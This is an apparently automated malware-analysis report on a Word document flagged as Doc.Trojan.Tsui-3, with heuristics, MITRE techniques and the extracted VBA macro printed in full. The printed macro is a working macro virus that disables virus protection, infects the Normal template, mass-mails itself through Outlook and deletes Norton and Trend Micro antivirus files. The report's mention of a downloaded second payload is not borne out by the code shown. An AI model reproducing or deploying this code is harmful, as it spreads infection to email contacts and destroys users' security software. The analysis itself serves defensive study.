MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer
The sample is a malicious OLE document containing VBA macros, specifically an AutoOpen macro that attempts to execute code. Heuristics indicate the use of CreateObject and p-code execution, suggesting the macro is designed to download and run a secondary payload. The ClamAV detection name 'Doc.Trojan.Tsui-3' further supports its malicious nature.
Heuristics 6
-
ClamAV: Doc.Trojan.Tsui-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Tsui-3
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15724 bytes |
SHA-256: 2ee09dd91432e22384723bdc314172c63197fbe58795f57c932506fad4a60827 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
'³o¬O¤@°¦¥Î¨Ó¬ã¨s¥Îªºµ{¦¡,°ò¥»¤W¤£·|³y¦¨¥ô¦ó¹q¸£ªº¶Ë®`
'§Æ±æ¯à´£¨Ñµ¹¦³¿³½ì¬ã¨s¥¨¶°µ{¦¡ªº¤H
'§Ú¤£¹ªÀy±z§ó§ï³oÓµ{¦¡
'¥H§K³y¦¨¥L¤H¶Ë®`
'§Þ³N:ÁͶլì§Þ´£¨Ñ(¬ö©s§»¥ý¥Í¤j§@¥¨¶°¯f¬r§¹¥þ¯}¸Ñ¤â¥U),·L³n¤ä´©(¦UÃþvba¤â¥U)
'§@ªÌ:®çªá®q¥D
On Error Resume Next
Options.VirusProtection = Chr(48): Options.SaveNormalPrompt = Chr(48): Options.ConfirmConversions = Chr(48)
havevir = 0
doc = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.countoflines
nor = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.countoflines
If nor > Abs(havevir) And doc > Abs(havevir) Then GoTo tsuicy
If nor = Abs(havevir) Then
Set norset = NormalTemplate.VBProject.VBComponents
Set docset = ActiveDocument.VBProject.VBComponents
docset.Item(1).Name = norset.Item(1).Name
docset.Item(1).Export Windows.Application.Path & ".dll"
End If
If doc = Abs(havevir) Then Set norset = ActiveDocument.VBProject.VBComponents
norset.Item(1).codemodule.AddFromFile Windows.Application.Path & ".dll"
With norset.Item(1).codemodule
For j = Chr(49) To Chr(52)
.deletelines 1
Next j
End With
If nor = Abs(havevir) And doc = Abs(havevir) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
tsuicy:
If nor <> Abs(havevir) And doc = Abs(havevir) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
If Tasks.Exists("Microsoft Outlook") = True Then
'MsgBox "outlook is running"
Set myoutapp = CreateObject("outlook.application")
Set mynamespace = myoutapp.getnamespace("MAPI")
Set myinboxfolder = mynamespace.getdefaultfolder(6)
Set myitems = myinboxfolder.items
For j = 1 To myitems.Count
Set myitem = myitems(j)
Set newitem = myoutapp.createitem(0)
newitem.Subject = "³Ì¨üÅwªï¥D¼½°Ý¨é½Õ¬d"
newitem.body = "½Ð¶ñ§´°Ý¨éE-MAIL¦^tvbs·s»D³¡,§Ú̱N°e±zNOKIA 8810¤â¾÷¤@°¦"
newitem.To = myitem.SenderName
newitem.attachments.Add ActiveDocument.FullName
'newitem.Display
newitem.send
Next
Set new1item = myoutapp.createitem(0)
new1item.Subject = "§Ú¥þ¤O¤ä«ù½±¶®²N"
new1item.body = "¥þ¥xÆW³ÌÀuªº¥D¼½´N¬O©p°Õ.......§Ú¤ä«ù©p"
new1item.To = "vivian_chiang@mail.ftv.com.tw"
new1item.send
End If
If Day(Now) = 30 And Month(Now) = 6 Then
MsgBox "±Z§g¿Phappy birthday"
End If
Dim str1file As String
str1file = Dir("c:\program files\", vbDirectory)
Do Until str1file = ""
If str1file = "Norton AntiVirus" Then
str2 = "c:\program files\" & str1file
'MsgBox "norton is found"
With Application.FileSearch
.LookIn = str2
.SearchSubFolders = False
.FileName = "*.*"
If .Execute() > 0 Then
For i = 1 To .FoundFiles.Count
Kill .FoundFiles(i)
Next i
End If
End With
End If
str1file = Dir
Loop
Dim pcfile As String
pcfile = Dir("c:\program files\", vbDirectory)
Do Until pcfile = ""
pcdir = Left(pcfile, 10)
If pcdir = "Trend PC-c" Then
pcstr2 = "c:\program files\" & pcfile
'MsgBox "pc-cllin is found"
With Application.FileSearch
.LookIn = pcstr2
.SearchSubFolders = False
.FileName = "*.*"
If .Execute() > 0 Then
For i = 1 To .FoundFiles.Count
Kill .FoundFiles(i)
Next i
End If
End With
End If
'MsgBox str1file
pcfile = Dir
Loop
lo:
With Assistant.NewBalloon
.Heading = "³Ì¨üÅwªï¥D¼½°Ý¨é"
.Text = "þ¤@¦ì¬O¥xÆW³ÌÄꪺ¹qµø¥D¼½?"
.Checkboxes(1).Text = "§õ¥|ºÝ"
.Checkboxes(2).Text = "¨H¬KµØ"
.Checkboxes(3).Text = "À¹©¾¤¯"
.Checkboxes(4).Text = "±i¶®µ^"
.Checkboxes(5).Text = "½±¶®²N"
.Button = msoButtonSetOK
.Show
Select Case True
Case .Checkboxes(1).Checked
MsgBox "¥L¤£ºâÄê,ÁÙ®¼¦³½s¿è¯à¤O": GoTo lo
Case .Checkboxes(2).Checked
MsgBox "¦oÁöµMÄê,«o«D³ÌÄê,˼ƲĤG¦Ó¤w": GoTo lo
Case .Checkboxes(3).Checked
MsgBox "Áö±`¦YÁ³µ·,¥u¬O´¶³qÄê": GoTo lo
Case .Checkboxes(4).Checked
MsgBox "¨S¿ù!¥þ¥xÆW³ÌÄꪺ¹qµø¥D¼½´N¬O¦o-±i¶®µ^"
Case .Checkboxes(5).Checked
MsgBox "§ÚªY½àªº¥D¼½,¦³¤~®ð,¤£¿ù®@": GoTo lo
Case
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.